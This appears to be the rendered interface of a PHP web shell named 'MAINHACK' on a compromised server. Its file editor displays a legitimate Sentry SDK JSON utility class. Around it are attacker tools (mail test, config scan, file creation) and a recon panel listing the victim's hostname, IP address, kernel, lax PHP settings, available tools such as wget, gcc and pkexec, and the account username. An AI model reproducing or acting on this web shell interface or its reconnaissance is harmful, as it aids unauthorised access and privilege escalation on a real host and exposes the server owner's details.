[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: JSON.php
<?php declare(strict_types=1); namespace Sentry\Util; use Sentry\Exception\JsonException; /** * This class provides some utility methods to encode/decode JSON data. * * @author Stefano Arlandini <sarlandini@alice.it> * * @internal */ final class JSON { /** * Encodes the given data into JSON. * * @param mixed $data The data to encode * @param int $options Bitmask consisting of JSON_* constants * @param int $maxDepth The maximum depth allowed for serializing $data * * @throws JsonException If the encoding failed */ public static function encode($data, int $options = 0, int $maxDepth = 512): string { if ($maxDepth < 1) { throw new \InvalidArgumentException('The $maxDepth argument must be an integer greater than 0.'); } $options |= \JSON_UNESCAPED_UNICODE | \JSON_INVALID_UTF8_SUBSTITUTE | \JSON_PARTIAL_OUTPUT_ON_ERROR; $encodedData = json_encode($data, $options, $maxDepth); $allowedErrors = [\JSON_ERROR_NONE, \JSON_ERROR_RECURSION, \JSON_ERROR_INF_OR_NAN, \JSON_ERROR_UNSUPPORTED_TYPE]; $encounteredAnyError = \JSON_ERROR_NONE !== json_last_error(); if (($encounteredAnyError && ('null' === $encodedData || false === $encodedData)) || !\in_array(json_last_error(), $allowedErrors, true)) { throw new JsonException(sprintf('Could not encode value into JSON format. Error was: "%s".', json_last_error_msg())); } return $encodedData; } /** * Decodes the given data from JSON. * * @param string $data The data to decode * * @return mixed * * @throws JsonException If the decoding failed */ public static function decode(string $data) { $decodedData = json_decode($data, true); if (\JSON_ERROR_NONE !== json_last_error()) { throw new JsonException(sprintf('Could not decode value from JSON format. Error was: "%s".', json_last_error_msg())); } return $decodedData; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.53 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002